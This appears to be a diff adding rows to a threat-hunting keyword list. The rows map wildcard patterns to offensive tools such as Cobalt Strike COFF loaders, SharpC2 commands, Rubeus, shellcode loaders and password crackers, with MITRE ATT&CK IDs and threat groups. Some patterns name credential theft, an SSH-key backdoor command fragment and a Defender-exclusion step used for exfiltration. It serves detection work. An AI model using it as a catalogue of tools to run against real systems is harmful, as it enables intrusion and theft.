+"*COFFLdr.cpp*","offensive_tool_keyword","Jormungandr","Jormungandr is a kernel implementation of a COFF loader allowing kernel developers to load and execute their COFFs in the kernel","T1215 - T1059.003 - T1547.006","TA0004 - TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Idov31/Jormungandr","1","1","N/A","N/A","3","203","23","2023-09-26T18:06:53Z","2023-06-25T06:24:16Z"
+"*COFFLdr.exe*","offensive_tool_keyword","Jormungandr","Jormungandr is a kernel implementation of a COFF loader allowing kernel developers to load and execute their COFFs in the kernel","T1215 - T1059.003 - T1547.006","TA0004 - TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Idov31/Jormungandr","1","1","N/A","N/A","3","203","23","2023-09-26T18:06:53Z","2023-06-25T06:24:16Z"
+"*COFFLoader.*","offensive_tool_keyword","cobaltstrike","This is a quick and dirty COFF loader (AKA Beacon Object Files). Currently can run un-modified BOF's so it can be used for testing without a CS agent running it","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/COFFLoader","1","1","N/A","10","10","387","62","2023-05-15T20:42:41Z","2021-02-19T19:14:43Z"
+"*COFFLoader64.exe*","offensive_tool_keyword","cobaltstrike","This is a quick and dirty COFF loader (AKA Beacon Object Files). 
Currently can run un-modified BOF's so it can be used for testing without a CS agent running it","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/COFFLoader","1","1","N/A","10","10","387","62","2023-05-15T20:42:41Z","2021-02-19T19:14:43Z"
+"*CognisysGroup/HadesLdr*","offensive_tool_keyword","HadesLdr","Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/CognisysGroup/HadesLdr","1","1","N/A","10","3","221","33","2023-07-15T21:23:49Z","2023-07-12T11:44:07Z"
+"*coinomi2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*coldfusion_dir_traversal_exploit*","offensive_tool_keyword","beef","BeEF is short for The Browser 
Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z"
+"*Collection/MiniDumpWriteDump.*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z"
+"*Collection_ArchiveCollectedData_ArchiveViaCustomMethod.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z"
+"*Collection_ArchiveCollectedData_ArchiveViaCustomMethod_7z.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z"
+"*com.rastamouse.*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z"
+"*com_exec_go(*","offensive_tool_keyword","cobaltstrike","Bloodhound Attack Path Automation in CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/vysecurity/ANGRYPUPPY","1","0","N/A","10","10","300","93","2020-04-26T17:35:31Z","2017-07-11T14:18:07Z"
+"*combine_harvester-main*","offensive_tool_keyword","combine_harvester","Rust in-memory dumper","T1055 - T1055.001 - T1055.012","TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/m3f157O/combine_harvester","1","1","N/A","10","2","101","17","2023-07-26T07:16:00Z","2023-07-20T07:37:51Z"
+"*com-exec.cna*","offensive_tool_keyword","cobaltstrike","Bloodhound Attack Path Automation in CobaltStrike","T1548.002 - T1548.003 - T1134.001 
- T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/vysecurity/ANGRYPUPPY","1","1","N/A","10","10","300","93","2020-04-26T17:35:31Z","2017-07-11T14:18:07Z"
+"*COMHunter* -inproc*","offensive_tool_keyword","COMHunter","Enumerates COM servers set in LocalServer32 and InProc32 keys on a system using WMI","T1087.002 - T1012 - T1057","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/matterpreter/OffensiveCSharp/tree/master/COMHunter","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z"
+"*COMHunter* -localserver*","offensive_tool_keyword","COMHunter","Enumerates COM servers set in LocalServer32 and InProc32 keys on a system using WMI","T1087.002 - T1012 - T1057","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/matterpreter/OffensiveCSharp/tree/master/COMHunter","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z"
+"*COMHunter.csproj*","offensive_tool_keyword","COMHunter","Enumerates COM servers set in LocalServer32 and InProc32 keys on a system using WMI","T1087.002 - T1012 - 
T1057","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/matterpreter/OffensiveCSharp/tree/master/COMHunter","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z"
+"*COMHunter.exe*","offensive_tool_keyword","COMHunter","Enumerates COM servers set in LocalServer32 and InProc32 keys on a system using WMI","T1087.002 - T1012 - T1057","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/matterpreter/OffensiveCSharp/tree/master/COMHunter","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z"
+"*COMHunter.sln*","offensive_tool_keyword","COMHunter","Enumerates COM servers set in LocalServer32 and InProc32 keys on a system using WMI","T1087.002 - T1012 - T1057","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/matterpreter/OffensiveCSharp/tree/master/COMHunter","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z"
+"*COM-Hunter_v*.zip*","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistnce tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","1","N/A","10","3","215","39","2023-09-06T09:48:55Z","2022-05-26T19:34:59Z"
+"*COM-Hunter-main*","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistnce tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","1","N/A","10","3","215","39","2023-09-06T09:48:55Z","2022-05-26T19:34:59Z"
+"*-command *.exe* -technique ccmstp*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z"
+"*-Command Add-MpPreference -ExclusionProcess 
*\Program Files\FreeFileSync\Bin\*","greyware_tool_keyword","freefilesync","freefilesync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://freefilesync.org/download.php","1","0","N/A","9","10","N/A","N/A","N/A","N/A"
+"*command_obfuscator.py*","offensive_tool_keyword","Bashfuscator","A fully configurable and extendable Bash obfuscation framework","T1027 - T1027.004 - T1059 - T1059.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Bashfuscator/Bashfuscator","1","0","N/A","10","10","1348","159","2023-09-05T10:40:25Z","2018-08-03T21:25:22Z"
+"*command=*###---POWERSHELL---*eval $(echo *","offensive_tool_keyword","Openssh","Infecting SSH Public Keys with backdoors","T1098.003 - T1562.004 - T1021.004","TA0006 - TA0002 - TA0011","N/A","N/A","C2","https://blog.thc.org/infecting-ssh-public-keys-with-backdoors","1","0","N/A","10","9","N/A","N/A","N/A","N/A"
+"*CommandAndControl_*.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z"
+"*CommandCam.exe*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z"
+"*commandovm.*.installer.fireeye*","offensive_tool_keyword","commando-vm","CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.","T1059 - T1053 - T1055 - T1070","TA0002 - TA0004 - TA0008","N/A","N/A","Exploitation OS","https://github.com/mandiant/commando-vm","1","1","N/A","N/A","10","6326","1249","2023-10-03T19:02:49Z","2019-03-26T22:36:32Z"
+"*commando-vm-master*","offensive_tool_keyword","commando-vm","CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.","T1059 - T1053 - T1055 - T1070","TA0002 - TA0004 - TA0008","N/A","N/A","Exploitation OS","https://github.com/mandiant/commando-vm","1","1","N/A","N/A","10","6326","1249","2023-10-03T19:02:49Z","2019-03-26T22:36:32Z"
+"*Commands/Brute.*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z"
+"*Commands/Createnetonly.*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z"
+"*Commands/DcomCommand.*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z"
+"*Commands/DroneCommand.*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z"
+"*Commands/ExecuteAssembly.*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z"
+"*Commands/KillProcess.*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z"
+"*Commands/ListProcesses.*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - 
TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z"
+"*Commands/Logonsession.*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z"
+"*Commands/PowerShellImport.*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z"
+"*Commands/Preauthscan.*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z"
+"*Commands/PrintWorkingDirectory.*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z"
+"*Commands/PsExecCommand.*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z"
+"*Commands/RevToSelf.*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z"
+"*Commands/RunPe.*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z"
+"*Commands/SetSleep.*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - 
TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z"
+"*Commands/Shell.*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z"
+"*Commands/ShInject.*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z"
+"*Commands/ShSpawn.*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z"
+"*Commands/Silver.*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z"
+"*Commands/StealToken.*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z"
+"*Commands/StopDrone.*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z"
+"*Commands/TakeScreenshot.*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z"
+"*Commands/WhoAmI.*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z"
+"*Commands/WinRmCommand.*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - 
TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z"
+"*Commands/WmiCommand.*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z"
+"*commixproject/commix*","offensive_tool_keyword","commix","Automated All-in-One OS command injection and exploitation tool.","T1059 - T1053 - T1503","TA0002 - TA0003 - TA0040","N/A","N/A","Exploitation tools","https://github.com/commixproject/commix","1","1","N/A","N/A","10","4035","782","2023-09-29T06:39:41Z","2015-03-20T08:38:26Z"
+"*common.ReflectiveDLL*","offensive_tool_keyword","cobaltstrike","Example code for using named pipe output with beacon ReflectiveDLLs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/rxwx/cs-rdll-ipc-example","1","1","N/A","10","10","101","24","2020-06-24T19:47:35Z","2020-06-24T19:43:56Z"
+"*common.ReflectiveDLL*","offensive_tool_keyword","cobaltstrike","Spectrum Attack Simulation beacons","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas/","1","1","N/A","10","10","594","117","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z"
+"*common_passwords.txt*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","1","N/A","N/A","10","8184","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z"
+"*commonspeak_sublist.txt*","offensive_tool_keyword","AttackSurfaceMapper","AttackSurfaceMapper (ASM) is a reconnaissance tool that uses a mixture of open source intelligence and active techniques to expand the attack surface of your target","T1595 - 
T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/superhedgy/AttackSurfaceMapper","1","0","N/A","6","10","1221","192","2023-09-11T05:26:53Z","2019-08-07T14:32:53Z"
